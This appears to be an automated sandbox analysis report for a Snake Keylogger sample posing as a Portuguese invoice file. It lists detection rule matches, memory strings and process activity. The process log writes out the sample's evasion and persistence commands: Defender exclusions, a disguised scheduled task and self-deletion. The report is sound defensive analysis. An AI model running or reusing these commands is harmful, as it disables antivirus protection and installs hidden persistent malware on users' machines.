              Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1493095969.00000000070C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PROFORMA + PENDENTES.exe
              Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1491715421.0000000005C00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs PROFORMA + PENDENTES.exe
              Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1483837011.0000000002791000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs PROFORMA + PENDENTES.exe
              Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1482897862.0000000000A0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PROFORMA + PENDENTES.exe
              Source: PROFORMA + PENDENTES.exe, 00000000.00000000.1422736958.0000000000448000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamerhLq.exe8 vs PROFORMA + PENDENTES.exe
              Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1483837011.00000000027AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs PROFORMA + PENDENTES.exe
              Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs PROFORMA + PENDENTES.exe
              Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PROFORMA + PENDENTES.exe
              Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1632314031.00000000064DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs PROFORMA + PENDENTES.exe
              Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs PROFORMA + PENDENTES.exe
              Source: PROFORMA + PENDENTES.exeBinary or memory string: OriginalFilenamerhLq.exe8 vs PROFORMA + PENDENTES.exe
              Source: PROFORMA + PENDENTES.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 3636, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 3636, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: PROFORMA + PENDENTES.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: WYqxTmjfOgdZ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, -.csBase64 encoded string: 'rVcDcqwDGuhtp0/cyaG3Tnaelff0t92wtBM+vhlsUrQBFjw1qEXRZosFllLoQ06t'
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, -.csBase64 encoded string: 'rVcDcqwDGuhtp0/cyaG3Tnaelff0t92wtBM+vhlsUrQBFjw1qEXRZosFllLoQ06t'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, uKGLrW3QqA3lP5biGX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, uKGLrW3QqA3lP5biGX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, gcGUX2Bedx6QaYS31J.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, gcGUX2Bedx6QaYS31J.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, gcGUX2Bedx6QaYS31J.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, gcGUX2Bedx6QaYS31J.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, gcGUX2Bedx6QaYS31J.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, gcGUX2Bedx6QaYS31J.csSecurity API names: _0020.AddAccessRule
              Source: classification engineClassification label: mal100.troj.evad.winEXE@33/15@3/2
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeFile created: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5184:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2100:120:WilError_03
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3E72.tmpJump to behavior
              Source: PROFORMA + PENDENTES.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: PROFORMA + PENDENTES.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: PROFORMA + PENDENTES.exeReversingLabs: Detection: 32%
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeFile read: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp5B41.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess created: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp5B41.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess created: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: msdmo.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
